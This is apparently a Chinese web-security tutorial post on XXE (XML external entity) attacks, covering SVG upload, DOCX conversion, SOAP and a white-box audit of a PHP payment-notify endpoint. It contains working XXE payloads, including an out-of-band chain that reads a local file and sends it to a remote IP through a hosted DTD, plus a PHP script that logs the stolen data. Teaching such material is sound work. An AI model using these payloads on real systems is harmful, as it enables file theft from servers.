Web攻防-XML&XXE&上传解析&文件预览&接口服务&白盒审计&应用功能&SRC报告

发布于:2025-07-10 ⋅ 阅读:(20) ⋅ 点赞:(0)

知识点:
1、WEB攻防-XML&XXE-黑盒功能点挖掘
2、WEB攻防-XML&XXE-白盒函数点挖掘
3、WEB攻防-XML&XXE-SRC报告

一、演示案例-WEB攻防-XML&XXE-黑盒功能点挖掘

1、不安全的图像读取-SVG

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://dnslog.cn" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

在这里插入图片描述
在这里插入图片描述

2、不安全的文档转换-DOCX

参考地址:https://blog.csdn.net/weixin_57567655/article/details/124588490
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
也可以使用工具直接生成:https://github.com/whitel1st/docem

3、不安全的传递服务-SOAP

在这里插入图片描述
在这里插入图片描述

二、演示案例-WEB攻防-XML&XXE-白盒函数点挖掘

1、漏洞函数simplexml_load_string

在这里插入图片描述

2、pe_getxml函数调用了漏洞函数

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、wechat_getxml调用了pe_getxml

在这里插入图片描述
在这里插入图片描述

4、notify_url调用了wechat_getxml

在这里插入图片描述
在这里插入图片描述

5、访问notify_url文件触发wechat_getxml函数,构造Paylod测试。

在这里插入图片描述

先尝试读取文件,无回显后带外测试:
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://1uwlwv.dnslog.cn">
%file;
]>
<root>&send;</root>

在这里插入图片描述
在这里插入图片描述

然后带外传递数据解决无回显:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/1.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
 
test.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">

get.php:
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

三、演示案例-WEB攻防-XML&XXE-SRC报告

https://xz.aliyun.com/news/16463
https://mp.weixin.qq.com/s/biQgwMU2v1I92CsDOFRB7g
https://mp.weixin.qq.com/s/1pj9sbwKT6RjIiLgNC7-Gg
https://mp.weixin.qq.com/s/Mgd91_Iie-wZU7MqP5oCXw


网站公告

今日签到

点亮在社区的每一天
去签到